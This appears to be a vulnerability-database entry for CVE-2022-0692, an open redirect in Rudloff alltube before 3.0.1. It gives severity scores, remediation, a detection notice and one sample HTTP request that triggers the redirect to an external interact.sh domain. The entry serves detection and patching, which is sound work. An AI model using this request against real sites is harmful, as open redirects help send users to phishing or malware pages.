🔙 목록으로 돌아가기

CVE-2022-0692: Rudloff alltube prior to 3.0.1 - Open Redirect

TitleRudloff alltube prior to 3.0.1 - Open Redirect
Author0x_Akoko
SeverityMedium
ImpactAn attacker can exploit this vulnerability to redirect users to malicious websites, leading to potential phishing attacks or the download of malware.
RemediationUpgrade to version 3.0.1 or later to fix the open redirect vulnerability.
CVSS Score6.1
EPSS Score0.20834
CVE IDCVE-2022-0692
CWE IDCWE-601
Tags cve cve2022 huntr redirect rudloff alltube alltube_project vuln

🔍 Vulnerability Description

An open redirect vulnerability exists in Rudloff/alltube that could let an attacker construct a URL within the application that causes redirection to an arbitrary external domain via Packagist in versions prior to 3.0.1.

🌐 HTTP Request

GET /index.php/interact.sh HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/600.1.17 (KHTML, like Gecko) Version/7.1 Safari/537.85.10
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-0692.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-0692.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A